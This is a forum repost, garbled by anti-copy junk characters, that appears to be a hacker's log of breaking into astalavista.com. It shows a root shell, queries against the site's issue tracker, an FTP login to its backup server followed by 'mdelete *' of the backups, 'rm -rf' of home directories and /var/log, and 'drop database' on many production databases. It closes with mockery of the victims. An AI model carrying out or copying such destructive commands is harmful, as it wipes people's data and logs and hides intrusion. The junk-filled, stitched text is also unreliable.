8 B4 n7 u$ o8 ?" O| Website guidance | Virtual Girl which guides you trought the website.
' C, I( p  y: q1 D8 i  I: d; G% f" u! U
5 _1 }8 H2 K1 D- RWe need a girl with who you can ( talk )!!!
) i7 t; e  i; v+ _- |$ dAlso for the News!; z, g! O" D* v3 C
So my suggestion is a girl who read you the news loud if you like!/ O& H0 ?) B& T
you can choose between read yourselfe or she read it for you or both!
+ H! Z2 E" z0 v
* P  ?7 J8 F6 O& T) I2 Q% z, SGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
9 O- R9 A/ v% t: E& e, g/ r/ I% B9 F, |) s5 ^- K- r' R* t# V
Have a look on the example girls!!
# U2 f% X" i: p' [6 N# x* b( ?
3 K& Z0 t9 B1 W7 v0 }" h0 Q0 L链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]4 X7 A2 a3 l$ W1 i* u& y, d
+ @% v5 f3 {+ r; H! X1 P
or that
* r: Q  w. M( P$ ^3 e- S- x6 Q) j- a+ T2 H
链接标记[url]http://www.yellostrom.de/[/url]
6 @$ v, |+ O9 b3 j/ Z( ~" ?1 \! X7 c: I
|% |' ]9 N2 `- B5 V, _9 Y
+——————+———————————————————————————————+. r2 V8 M8 z; K7 R' p8 O
1 row in set (0.00 sec)! K6 E3 G2 u: l/ @4 B# u4 @1 V
! q+ E( W/ d3 v0 K: W- S, l
// ha ha.
: F& ^* d/ k* W& C1 W+ B
. o% K7 T; D' v5 h+ T) w/ rmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;2 l( O3 A* N$ s
+————————–+———————————————————————————————————–+" p8 G# n% w! E
| iss_summary              | iss_description                                                                                           |
0 \& g7 v. c0 g+————————–+———————————————————————————————————–+: O  q# V- |" x/ t8 f' b0 g
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
/ j4 |* e9 ^( l+————————–+———————————————————————————————————–+; W- V, C& \0 \5 G8 g' e6 L* ]4 _
1 row in set (0.00 sec)
$ Q5 a& S2 k6 N4 M. ?* }* i8 T
( C% Q# y6 n" o$ r6 z9 P* q// LOL.0 `  |( P* w/ q$ u
2 ^* c, z1 \( [% A6 F! ^
mysql> exit* D. T  n) Y8 Z# |- t
Bye
- I2 Y1 c# p7 {$ K5 Z
+ k8 i. m) a# csh-3.2# ftp 212.254.194.163
8 M0 |1 R+ h4 D2 u/ dConnected to 212.254.194.163.6 U9 k: ?2 L7 Q& v+ N
220 BackupCOM_VW FTP server ready.% G5 l( \* J, s6 u& s4 X+ Y% O
504 AUTH: security mechanism ‘GSSAPI’ not supported.
& c# x9 }6 O. s, x! Y( F504 AUTH: security mechanism ‘KERBEROS_V4′ not supported., g  i9 A: U: [
KERBEROS_V4 rejected as an authentication type
/ B# ]3 K% D, F+ S9 ~3 C5 VName (212.254.194.163:root): astalavista.com
& S7 m5 l; F6 r331 Password required for astalavista.com.8 D# c& ^& |. k& v" J
Password:. Z6 t/ @7 j3 e5 O6 p
230 User astalavista.com logged in.
7 H( Z* z$ ]* G5 KRemote system type is UNIX.0 K: P* C' C6 h5 _
Using binary mode to transfer files.0 w! A+ u& g1 j6 X- X
ftp> ls -la8 V3 L3 k$ K; n, z
227 Entering Passive Mode (212,254,194,163,2,188)3 |# l9 W: ?- g; C
150 Opening BINARY mode data connection for ‘file list’.
! [$ R- p- Z* T. c2 D: C' Q4 O# S* bdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
, r, ~# B; J, M- ~% D1 u2 K226 Transfer complete.. @5 _- H  `' g1 l5 t
ftp> cd astalavista.com
( r4 n) `( B! s2 s' F' u' K250 CWD command successful.3 Z6 f" z0 e) [9 |  v* {
ftp> ls -la4 ^0 x2 B+ S$ S: f! Q
227 Entering Passive Mode (212,254,194,163,2,189)
- n, ?: _8 T- P3 A/ @4 j150 Opening BINARY mode data connection for ‘file list’.
; ^: a/ A' U* z" @-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
8 m  L$ [- Q/ E/ p-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2- S* `) w& T9 n* T7 w3 z( j
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
1 G# f5 n2 a- g-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar6 J9 }# P7 @1 |' n* B& V# m" }
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar; M2 a; \# C) ?7 a! b3 \  p
[snip]. w" ~- c, b% p8 T) A' j1 V9 ]) U- x
226 Transfer complete.
, {7 {% Z) t" Y. G1 jftp> mdelete *% N9 B2 F7 f3 P! R9 f2 T: _# E
ftp> ls -la
9 j" A) G. `: W! x: T, y227 Entering Passive Mode (212,254,194,163,2,193)4 |& J2 K) u# M; ~& w) g
150 Opening BINARY mode data connection for ‘file list’.3 S: p) }  o* g' [
226 Transfer complete.
- P" w+ e& t. _# v: _ftp>) Z' q3 k, P  }' T7 U0 P7 p9 x
/ K$ v  l% \5 n1 [# C9 e0 w3 x
sh-3.2# cd /home0 @8 a; l3 {1 v. l; v) k/ ?
sh-3.2# ls -la
6 O7 ]* F- `/ s8 c  w6 }total 120
" R, J5 O9 a+ [# n9 J/ W2 \- jdrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
% K3 ]7 z9 N/ Q8 v' M' ]5 wdrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
' B8 L4 s( }0 j; ?' r. Odrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
+ M. }2 k  k$ e8 R2 @! }-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group( r& v" t  X/ A: A; N: ^) [; {# R
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
, j) q; ?' [: {# ydrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet& y$ M  m7 O' R9 z9 P0 l
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup- C* B4 {2 u: S. J. D3 h
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
5 p3 U+ ^' A2 D) t6 w, S* n# Idrwx–x–x 10 com     com      4096 Apr 28 12:40 com
, [3 e& T6 l3 W- Fdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
" ?) z& M( y* ~drwx——  3 jon     jon      4096 Sep 21  2007 jon
( c& e$ M  q5 Sdrwx——  2 root    root    16384 Sep 11  2007 lost+found
* _+ k2 I  S" S9 i7 _8 t$ }* _. N0 Ydrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
+ U5 a3 ^2 j) ^drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata2 c3 L5 ]2 }; D! g, k( X% t
drwx——  2 jon     jon      4096 Sep 15  2007 test% P' L* {" \3 }9 p2 f
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp2 l6 |/ @+ X9 t
5 ~* x. M% V: ?' x9 f
sh-3.2# rm -rf backup/0 E1 u& {! o/ [9 z0 n" M9 J7 d
sh-3.2# rm -rf backup.14161/: \6 U" c6 n1 S& O7 }
sh-3.2# rm -rf ftp/
# V, b9 f" n; _0 psh-3.2# rm -rf jon/
& |. Z: h/ z) n# E  d' Psh-3.2# rm -rf my/
8 A1 h$ i$ x" F" Tsh-3.2# rm -rf mysqldata/
2 `1 F' @- v" Z5 v8 @5 c6 d, Csh-3.2# rm -rf test/
$ |+ q( ]. H8 k2 @" e. f' g4 a1 X5 b3 xsh-3.2# rm -rf tmp/( h2 Q! A2 [- X2 i4 G' ]9 X
sh-3.2# cd ~) T. i( V* y5 {5 `/ M0 F) m+ T
sh-3.2# rm -rf *
  Z$ Z+ T1 C- q- S! nsh-3.2# rm -rf /var/log/
$ m, o& q2 s: M/ _. h% S! c  p. lrm: cannot remove directory `/var/log//proftpd’: Directory not empty0 W$ W+ W9 T/ T
sh-3.2# rm -rf /home/*& u7 q+ D  l: x  m0 P
sh-3.2# mysql
5 x# E7 n1 W5 d2 X( UWelcome to the MySQL monitor.  Commands end with ; or \g.' K7 T: }0 ^7 z$ x4 p" V6 W
Your MySQL connection id is 407156) J5 ?  k, u6 l" N. p
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: ]+ i; t, `; ~' R$ y  ^% s+ N* d' v2 I7 `% {% R" l; w; K% A( W
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ A* v1 n  s7 m: s" x2 E
% e1 R- r! l" B' e1 C% P
mysql> show databases;
( P( i8 G4 W" T: N; M+———————–+
& w( \# n6 O) ?# u( G| Database              |) H, M8 e8 Q8 P" T* U" C: M; b, v
+———————–+! ~- U+ J, @5 n/ U9 u" C$ S. c
| information_schema    |
4 t" Z" u, Y. H| astanet_ads           |% j0 n% Q) P; a
| astanet_mailing_lists |1 o( k& T: T9 N* ]' R- w
| astanet_mediawiki     |2 Y# P. _4 v- ]6 p) d+ i$ X5 s% J
| astanet_membersystem  |
% l( r- m4 Q# E" K+ l5 e| com_contrexx          |
- X5 T9 U# C4 y4 d! l, \8 u& X| com_contrexx2         |" F1 R( M: \/ T% C  v
| com_contrexx2_live    |2 z% ?) X0 w2 J
| da_roundcube          |. L0 ~; k# K! e3 u" |
| dolphin               |
3 a3 P; s0 E  J| ideapool              |
7 r4 S1 f( k# W- ]| mysql                 |9 o2 r9 _, e% Z$ K  S8 v9 b3 A" @
| test                  |/ Q7 j: C" E% t! x8 a2 Y
| yourmaster            |
  p: j. t6 k, q# f* V% B+———————–+
! E% _7 h$ A2 S! g4 _2 H' R14 rows in set (0.03 sec)) Z: S, A& l5 x" B' R9 i* l6 Y

2 l; S9 s. q  jmysql> drop database astanet_membersystem;2 ?# W( S1 u: X- [/ C. b( M1 L
droQuery OK, 46 rows affected (0.81 sec)# y" B+ \/ i) y( w) [7 s3 `- g

, B" }! L( _& W9 Z1 @6 @  s2 imysql> drop database com_contrexx;
" s/ L9 f, a* Z  }4 |0 G% y( aQuery OK, 211 rows affected (2.72 sec)' R7 [- d/ \: e! L! w2 L

* j9 f, B2 k/ P! dmysql> drop database com_contrexx2;4 y" t# z' W5 b& Q
Query OK, 237 rows affected (2.23 sec)5 Z0 z9 P, r  M" s4 r

2 I+ E7 }2 _" t% o/ ymysql> drop database com_contrexx2_live;" R5 \, C, V  ^( H
Query OK, 227 rows affected (7.63 sec)- b+ [' o6 r6 [, J

; H: d' T  j5 ?$ Qmysql> drop database ideapool;0 {/ D- A+ [2 z( n: P
Query OK, 69 rows affected (0.19 sec)
9 Y4 L/ R  O  Y+ K0 n% h3 Y7 `8 O
7 j/ K+ V1 X" w' vmysql> drop database yourmaster;
+ t& w, D# Z5 j& J- fQuery OK, 158 rows affected (0.55 sec), A9 K% Q6 O: o3 g& a, h, m
. g1 p. G5 n" r) [7 Q
mysql> drop database astanet_ads;: K5 s2 m) O7 t5 f  z
Query OK, 9 rows affected (0.11 sec)& q9 n2 r5 c/ N9 R0 s% A

: {; Q, T( e! H# `3 U3 pmysql> drop database astanet_mailing_lists;4 l5 F" A- \0 D; M
Query OK, 24 rows affected (1.47 sec)
' }  a( K, i/ [1 Y: H# [8 |  \1 C0 x/ }. B
mysql> drop database astanet_mediawiki;
, Z' X6 J& z5 T/ S. pQuery OK, 31 rows affected (0.51 sec)
$ i3 W4 U% r% v# M0 ^( W8 I4 C! A& q- u$ Y2 H& U1 i/ b$ f6 Y
mysql> show databases;
) Z2 j. f) i$ W- u* g+——————–+, O. G0 `; ]4 d; @* q
| Database           |: r+ R- c/ X& j  t" Q7 D
+——————–+- g# O' z. L' a, X
| information_schema |9 ^7 Y( |; ?6 Q2 }1 g1 f+ f8 i
| da_roundcube       |
) a( B8 q: l& |8 b8 N0 R$ ^. s| dolphin            |: L3 {  ^6 S) z; Q0 [
| mysql              |# f: K  s  r8 `  T; z
| test               |8 X, n' O( N) i+ B5 i1 ^2 Y
+——————–+
6 A% s' l: W, U  U5 rows in set (0.00 sec)
! [( w& F  X# Z( p4 u- @
* R( @& D8 K; XWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
2 N  y# w$ |$ _( W; `& wtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the/ b5 ?. ]6 ^# H: w) |2 D! j5 e* j
wrong to say this pack of morons *wont be back*.$ W0 B( N; ^- H" s




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2